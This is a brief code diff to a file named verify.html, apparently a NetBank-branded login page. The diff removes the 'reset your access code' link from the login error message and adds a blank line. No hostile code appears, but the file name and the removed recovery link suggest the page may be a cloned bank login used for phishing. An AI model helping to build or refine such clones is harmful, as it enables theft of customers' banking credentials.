--- a/verify.html
+++ b/verify.html
@@ -225,8 +225,7 @@
       <div class="message-content">
         <p class="icon-block icon-info no-margin-bottom uia-error-message">
           <span>
-            Sorry, your login details don't seem right. Please check and try again or
-            <a class="uia-forgotten-access-code" href="javascript:;" id="forgottenAccessCode">reset your access code here</a>.
+            Sorry, your login details don't seem right. Please check and try again.
           </span>
         </p>
       </div>
@@ -516,4 +515,5 @@ document.write("<input type=\"hidden\" name=\"JS\" value=\"E\" />");
 	<input type="hidden" id="SC_MEDIAMIND_ID" name="SC_MEDIAMIND_ID" value=""/><input type="hidden" id="SC_PRODUCT_ID" name="SC_PRODUCT_ID" value=""/><input type="hidden" id="SC_CUSTOMER_TYPE" name="SC_CUSTOMER_TYPE" value="NetBank"/><input type="hidden" id="SC_SCREEN_NAME" name="SC_SCREEN_NAME" value=""/>
 </body>
 </html>
+
 
